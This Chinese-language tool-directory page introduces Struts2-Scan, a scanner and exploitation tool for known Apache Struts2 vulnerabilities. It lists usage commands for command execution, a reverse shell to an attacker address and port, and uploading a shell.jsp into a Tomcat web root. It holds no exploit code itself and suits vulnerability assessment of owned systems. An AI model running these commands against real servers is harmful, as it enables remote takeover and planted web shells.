Struts2-Scan:Struts2漏洞扫描利用工具
Struts2 - Scan是一个基于互联网上已公开的Struts2高危漏洞exp的扫描利用工具。它能支持多种Struts2漏洞检测,包括S2 - 001、S2 - 003等众多漏洞。支持单个和批量URL检测,还可进...
标签:Github项目Struts2-Scan Struts2漏洞扫描 漏洞利用工具【Github】项目名:Struts2-Scan:Struts2漏洞扫描利用工具
一、项目简介
Struts2 – Scan是一个基于互联网上已公开的Struts2高危漏洞exp的扫描利用工具。它能够支持多种Struts2漏洞的检测,如S2 – 001、S2 – 003等众多漏洞。支持单个URL漏洞检测和批量URL检测,还能进行指定漏洞利用,可获取WEB路径、执行命令、反弹shell和上传文件(注意并非所有漏洞均支持上述全部功能)。
二、运行环境与依赖
运行环境要求Python3.6.X及其以上版本,需要click、requests、bs4等第三方库。测试环境为Ubuntu16.04。
三、工具参数说明
1. 查看漏洞详细信息:使用python3 Struts2Scan.py –info。
2. 单个URL漏洞检测:如python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action。
3. 批量漏洞检测:例如python3 Struts2Scan.py -f urls.txt。
4. POST数据:可以通过python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -d name=admin&email=admin&age={exp}。
5. 指定漏洞名称利用:
– 命令执行:python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2 – 016 –exec。
– 反弹shell:python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2 – 016 –reverse 192.168.100.8:8888。
– 获取WEB路径:python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2 – 016 –webpath。
– 上传shell:python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2 – 016 –upfile shell.jsp –uppath /usr/local/tomcat/webapps/ROOT/shell.jsp。
四、项目总结
Struts2 – Scan是一款功能较为全面的Struts2漏洞扫描利用工具,对于检测Struts2漏洞有着重要的意义。欢迎大家留言分享使用体验或者提出改进建议。
项目地址
数据统计
数据评估
本站链氪巴士提供的Struts2-Scan:Struts2漏洞扫描利用工具都来源于网络,不保证外部链接的准确性和完整性,同时,对于该外部链接的指向,不由链氪巴士实际控制,在2024年12月6日 上午12:00收录时,该网页上的内容,都属于合规合法,后期网页的内容如出现违规,可以直接联系网站管理员进行删除,链氪巴士不承担任何责任。